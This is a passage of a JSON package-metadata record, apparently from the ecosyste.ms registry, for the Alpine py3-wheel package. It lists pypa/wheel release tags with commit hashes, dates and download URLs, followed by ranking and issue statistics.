/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sha":"3dc261abc98a5e43bc7fcf5783d080aaf8f9f0cf","kind":"commit","published_at":"2018-05-13T17:22:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.1/manifests"},{"name":"0.31.0","sha":"13d6ff3e8ef509b469d6bb6dd9cd8870ac3f2a16","kind":"commit","published_at":"2018-04-01T20:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.31.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.31.0/manifests"},{"name":"0.30.0","sha":"3c9cc212a76b334307985cebfa7ebf269a419223","kind":"commit","published_at":"2017-09-10T21:53:40.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:26.084Z","dependent_packages_count":9,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":5.106532840288783,"stargazers_count":9.755238598344778,"forks_count":7.571755590773023,"average":5.608381757351646},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.16","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_iss